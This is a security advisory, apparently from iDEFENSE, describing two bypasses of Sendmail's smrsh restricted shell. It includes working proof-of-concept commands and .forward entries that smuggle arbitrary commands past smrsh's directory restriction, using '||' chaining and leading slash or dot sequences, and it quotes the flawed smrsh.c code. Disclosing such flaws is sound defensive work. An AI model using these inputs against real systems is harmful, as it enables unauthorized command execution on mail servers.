Sendmail smrsh Bypass Vulnerabilities

The restrictions imposed by smrsh can be bypassed in such a way that an attacker can execute a binary by inserting a special character sequence into the .forward file. Two attack methods are detailed below.

This method takes advantage of the application's implementation of the '||' command. The process is best explained with an example:

    $ echo "echo unauthorized execute" > /tmp/unauth
    $ smrsh -c ". || . /tmp/unauth || ."
    /bin/sh: /etc/smrsh/.: is a directory
    unauthorized execute

/tmp/unauth is executed despite the fact that it is not located in the smrsh restricted directory, /etc/smrsh. This is because smrsh first checks for '.', which exists, and does no further verification on the files listed after '||'. The same attack would look like the following in the attacker's .forward file:

    "| . \|| . /tmp/unauth \|| ."

This method takes advantage of the following routine from smrsh.c:

    /* search backwards for last / */
    while (cmd > q)
            if ((*--cmd & 0177) == '/')

It is possible to feed SMRSH a command line that will be internally converted to a space thereby bypassing all filters, yet will still execute. Examples of these include:

    smrsh -c "/ command"
    smrsh -c "../ command"
    smrsh -c "./ command"
    smrsh -c "././ command"

The listed routine will convert any of the above examples to a space. However, when the following execle() call is reached:

    (void) execle("/bin/sh", "/bin/sh", "-c", \
    newcmdbuf, NULL, newenv);

SMRSH will execute:

    /bin/sh -c  command

Notice that despite the double space 'command' will still execute. The .forward variation of this attack works the same way.

iDEFENSE Advisory